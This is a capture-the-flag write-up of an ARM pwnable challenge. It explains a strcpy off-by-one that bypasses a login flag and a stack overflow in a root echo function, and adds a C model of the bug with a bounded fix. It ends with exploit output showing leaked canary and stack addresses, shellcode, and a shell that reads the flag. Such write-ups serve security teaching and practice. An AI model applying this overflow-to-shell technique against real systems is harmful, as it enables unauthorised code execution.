# arm-exploit
**Category:** Pwnable
**Points:** 856
**Solves:** 13
**Description:**
> Download in : [Link](https://drive.google.com/open?id=1aM2CTWFxKetOTMNfck71Bxv_ZGw05IzF)
> Service: nc armexploit.acebear.site 3001

## Writeup
```
$ file arm-exploit
arm-exploit: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=cbaf26f5088911adc7a36ef8ac96660a33f617d1, not stripped
```

### Setup Environment
#### Install
```
sudo apt-get install qemu
sudo apt-get install qemu-user-static kpartx
sudo apt-get install gdb-multiarch
```

#### Run
```
$ qemu-arm-static ./arm-exploit
**************************Welcome to Arm Exploit**************************
* *
*************************Challenge Created By CNV*************************
* Team: AceBear *
* My blog: https://chung96vn.blogspot.com/ *
**************************************************************************
*******************Arm Exploit******************
* *
* 1 - info *
* 2 - login *
* 3 - echo *
* 4 - change username *
* 5 - exit *
************************************************
Your choice:
```

#### Debug over gdb-multiarch
Terminal 1
```
$ qemu-arm-static -g 12345 ./arm-exploit
```

Terminal 2
```
$ gdb-multiarch
pwndbg> set architecture arm
The target architecture is assumed to be arm
pwndbg> target remote localhost:12345
Remote debugging using localhost:12345
0xf67d6a40 in ?? ()
...
► f 0 f67d6a40
pwndbg>
```

#### Run over python script
```python
from pwn import *

# Start the binary under qemu-user with a gdb stub on port 12345,
# then attach with gdb-multiarch (target remote localhost:12345)
r = process(["qemu-arm-static", "-g", "12345", "./arm-exploit"])  # run and debug

# Plain run, no debug stub
r = process(["qemu-arm-static", "./arm-exploit"])  # just run
```

### The Bug
The binary has the following functions: genpass, info, login, echo, change username and exit.

The first bug is in the **change_username** function:
* Up to 0x20 bytes of user input are read into `buf` on the stack.
* `strcpy(USER, buf)` copies until it finds a null byte. If all 0x20 bytes of `buf` are non-null, 0x20 bytes are copied into `USER` and the terminating null byte lands at `USER+0x20`, which is `isGuestLogin`. With `isGuestLogin = 0` the root login check is bypassed and the `rootecho` function becomes reachable.
```
.bss:0002209C USER % 0x20 ; DATA XREF: info+28↑o
.bss:000220BC isGuestLogin % 4 ; DATA XREF: info+48↑r
```
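The off-by-one above, as an added example that is not part of the original writeup: a C model of the `USER`/`isGuestLogin` layout (0x20 bytes apart, as in the `.bss` listing) with the vulnerable copy beside a bounded version. The initial `isGuestLogin` value of 1, the function names and the single zero byte modelled after `buf` are assumptions, not values taken from the binary.

```c
/* Added example, not the challenge's code. USER (0x20 bytes) and isGuestLogin
 * (4 bytes) are modelled as one byte array so the write at USER+0x20 is visible.
 * Assumes a little-endian target, as the ARM binary is. */
#include <stdint.h>
#include <string.h>

#define USER_LEN 0x20
static unsigned char bss[USER_LEN + sizeof(int32_t)]; /* USER, then isGuestLogin */

static int32_t is_guest_login(void) {
    int32_t v;
    memcpy(&v, bss + USER_LEN, sizeof v);
    return v;
}

/* Assumed initial state: empty USER, isGuestLogin = 1 (not logged in as root). */
static void reset_state(void) {
    int32_t guest = 1;
    memset(bss, 0, sizeof bss);
    memcpy(bss + USER_LEN, &guest, sizeof guest);
}

/* Vulnerable: mirrors change_username. Up to 0x20 bytes go into buf, then strcpy
 * copies until a NUL. buf[0x20] stands in for the zero byte the writeup relies on
 * finding right after buf on the stack, so a full 0x20-byte name makes strcpy
 * write its terminator at USER+0x20, clearing the low byte of isGuestLogin. */
int32_t change_username_vuln(const unsigned char *input, size_t len) {
    unsigned char buf[USER_LEN + 1];
    memset(buf, 0, sizeof buf);
    if (len > USER_LEN) len = USER_LEN;
    memcpy(buf, input, len);
    strcpy((char *)bss, (const char *)buf);
    return is_guest_login();
}

/* Fixed: bound the copy so the terminator always lands inside USER. */
int32_t change_username_fixed(const unsigned char *input, size_t len) {
    if (len > USER_LEN - 1) len = USER_LEN - 1;
    memcpy(bss, input, len);
    bss[len] = 0;
    return is_guest_login();
}
```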

The second bug is in the **rootecho** function:
* The buffer `s1` sits at `FP-0x88`, but `secure_read` reads up to 0x100 bytes into it, so the saved registers and return address above it on the stack can be overwritten (a stack overflow).
```c
int rootecho()
{
    int result;    // r0
    char s1;       // [sp+4h] [bp-88h]
    _BYTE v2[3];   // [sp+9h] [bp-83h]
    int v3;        // [sp+84h] [bp-8h]

    v3 = _bss_start;
    while ( 1 )
    {
        printf("root@arm-exploit:~$ ");
        secure_read(&s1, 0x100u);    // <======= Bug Here
        result = strcmp(&s1, "exit");
        if ( !result )
            break;
        if ( !strcmp(&s1, "help") )
        {
            puts("List command:");
            puts("$ echo argument");
            puts("$ exit");
            puts("$ help");
        }
        else if ( !memcmp(&s1, "echo ", 5u) )
        {
            puts(v2);
        }
        else
        {
            puts("Invalid Command! Try help");
        }
    }
    return result;
}
```
### Exploit
[arm_exploit.py](/pwn/arm_exploit/arm_exploit.py)
```
$ python arm.py 3
[+] Opening connection to armexploit.acebear.site on port 3001: Done
[*] canary: 0xd4bae800
[*] stack: 0xf6fffb34
[*] buff: 0xf6fffab0
[*] Paused (press any to continue)
[*] Switching to interactive mode
AAAAAAA?0\x8f��/�xF\x0e0?\x90I\x1a\x92\x1a'�Q\x037?�/bin//sh
root@arm-exploit:~$ $ id
uid=1000(arm_exploit) gid=1000(arm_exploit) groups=1000(arm_exploit)
$ cat /ho*/*/flag
AceBear{arm_i5_my_sad_m3m0ry}$
```

Original writeup (https://github.com/phieulang1993/ctf-writeups/tree/master/2018/AceBearSecurityContest/pwn/arm_exploit).